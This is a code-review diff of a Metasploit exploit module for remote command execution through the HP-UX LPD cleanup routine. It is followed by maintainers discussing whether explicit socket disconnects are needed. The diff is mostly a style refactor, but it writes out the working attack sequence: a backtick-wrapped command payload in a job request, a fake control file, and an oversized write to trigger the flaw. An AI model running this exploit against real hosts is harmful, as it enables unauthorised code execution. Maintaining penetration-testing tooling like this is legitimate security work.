modules/exploits/hpux/lpd/cleanup_exec.rb

```diff
@@ -3,95 +3,96 @@
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Space' => 200,
           'DisableNops' => true,
-          'BadChars'    => "\x00\x09\x20\x2f",
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl telnet',
-            }
+          'BadChars' => "\x00\x09\x20\x2f",
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic perl telnet'
+          }
         },
-      'Targets'        =>
-        [
-          [ 'Automatic Target', { }]
+        'Targets' => [
+          [ 'Automatic Target', {}]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2002-08-28'
-    ))
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2002-08-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
 
-    register_options(
-      [
-        Opt::RPORT(515)
-      ])
+    register_options([
+      Opt::RPORT(515)
+    ])
   end
 
   def exploit
-
     # The job ID is squashed down to three decimal digits
-    jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
+    jid = ($PROCESS_ID % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
 
     # Connect to the LPD service
     connect
 
-    print_status("Sending our job request with embedded command string...")
+    print_status('Sending our job request with embedded command string...')
+
     # Send the job request with the encoded command
-    sock.put(
-      "\x02" + rand_text_alphanumeric(3) + jid +
-      "`" + payload.encoded + "`\n"
-    )
+    sock.put("\x02#{rand_text_alphanumeric(3)}#{jid}`#{payload.encoded}`\n")
 
     res = sock.get_once(1)
-    if !(res and res[0,1] == "\x00")
-      print_status("The target did not accept our job request")
-      return
+    if !(res && res[0, 1] == "\x00")
+      fail_with(Failure::Unknown, 'The target did not accept our job request')
     end
 
-    print_status("Sending our fake control file...")
-    sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
+    print_status('Sending our fake control file...')
+    sock.put("\x02 32 cfA#{rand_text_alphanumeric(8)}\n")
+
     res = sock.get_once(1)
-    if !(res and res[0,1] == "\x00")
-      print_status("The target did not accept our control file")
-      return
+    if !(res && res[0, 1] == "\x00")
+      fail_with(Failure::Unknown, 'The target did not accept our control file')
     end
 
-    print_status("Forcing an error and hijacking the cleanup routine...")
+    print_status('Forcing an error and hijacking the cleanup routine...')
 
     begin
       sock.put(rand_text_alphanumeric(16384))
-      disconnect
-    rescue
+    rescue StandardError
+      # request may fail, this is expected
     end
-
+  ensure
+    disconnect unless sock.nil?
```

Comment:
nab: iirc this isn't "required", as modules keep track of sockets they've created, and there's an implicit `disconnect` on all socks that modules have created via `connect`

Reply:
> nab: iirc this isn't "required", as modules keep track of sockets they've created, and there's an implicit `disconnect` on all socks that modules have created via `connect`

Does this mean every `disconnect` can be removed from all modules (unless the module performs a `disconnect` following by `connect` again) ?

Reply:
I think it's more of a failsafe for modules that were leaking sockets, rather than a best practice to let the framework tidy up things - but that's all before my time 😄

https://github.com/rapid7/metasploit-framework/blob/5b9423c5fff53a42747e1d23f054a4966fe8d096/lib/msf/core/exploit/remote.rb#L29-L34

https://github.com/rapid7/metasploit-framework/blob/5b9423c5fff53a42747e1d23f054a4966fe8d096/lib/msf/core/exploit.rb#L423-L428

https://github.com/rapid7/metasploit-framework/blob/5b9423c5fff53a42747e1d23f054a4966fe8d096/lib/msf/core/exploit/remote.rb#L48-L57